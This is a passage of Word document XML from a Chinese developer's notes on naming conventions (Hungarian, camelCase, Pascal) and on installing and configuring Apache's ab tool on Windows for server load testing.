          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VS自带的压力测试工具，HttpTest4Net，Jmeter...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>安全检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>自动化部署</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VS的Web Deploy，Jenkins...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>监控平台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>自动化故障调控</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>命名规范</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>命名规范</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匈牙利命名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头字母用变量类型的缩写，其余部分用变量的英文或英文的缩写，要求单词的第一个字母大写。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ex：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Int iAge = 10; //i是int的缩写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Float fPrice = 5999.9; //f是float的缩写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>其他： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>前缀类型 a b by c cb cr cx,cy dw fn h i l lp m_ n np p s sz w （一一对应关系）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>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pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>驼峰式命名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>又叫小驼峰式命名法。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>第一个单词首字母小写，后面其他单词首字母大写。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ex：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Int age = 10;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String myName = </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LiLy</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>帕斯卡(</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://baike.baidu.com/item/Pascal%E8%AF%AD%E8%A8%80" \t "https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Pascal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)命名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>又叫大驼峰命名法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个单词的首字母都大写。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ex：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Int Age = 10;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String MyName = </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lily</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>还有些许其他的命名规范，如：下划线命名法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>压力测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用工具：ab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b是Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器自带的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一个压力测试工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Apache的ab命令模拟多线程并发请求，测试服务器负载压力，也可以测试nginx、lighthttp、IIS等其它Web服务器的压力。 </w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>ab命令对发出负载的计算机要求很低，既不会占用很多CPU，也不会占用太多的内存，但却会给目标服务器造成巨大的负载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在带宽不足的情况下，最好是本机进行测试，建议使用内网的另一台或者多台服务器通过内网进行测试，这样得出的数据，准确度会高很多。远程对web服务器进行压力测试，往往效果不理想（因为网络延时过大或带宽不足）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-94615</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>5511800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4611370" cy="2318385"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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37" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4611370" cy="2318385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://httpd.apache.org/download.cgi" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:i/>
        </w:rPr>
        <w:t>http://httpd.apache.org/download.cgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:i/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>选择Files For Microsoft Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-36195</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>8408670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3506470" cy="1798955"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3506470" cy="1798955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w: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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>点击ApacheHaus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>110490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>1232535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5203825" cy="2120900"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5203825" cy="2120900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w: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ind w:firstLine="420"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下载文件，并解压，这里我们假设解压到D盘。打开Apache文件里的conf文件夹中的httpd.conf文件，修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Define SRVROOT "D:/Program Files/Apache24"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，Listen(监听端口)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Listen 8088</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ServerName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(服务地址的端口号)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ServerName localhost:8088</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">DocumentRoot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">（测试文件存放地） </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DocumentRoot "D:/Program Files/Apache24/Test"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着调出cmd，输入：</w:t>
      </w:r>
      <w:r>
        <w:t>运行 httpd.exe -k install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装服务，打开服务</w:t>
      </w:r>
      <w:r>
        <w:t>httpd.exe -k start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。报错，提示“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>(OS 10048)通常每个套接字地址(协议/网络地址/端口)只允许使用一次 443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，将配置文件中的</w:t>
      </w:r>
      <w:r>
        <w:t>Include conf/extra/httpd-ahssl.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注释掉，或修改这个文件中的</w:t>
      </w:r>
      <w:r>
        <w:t>Listen 442 https</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
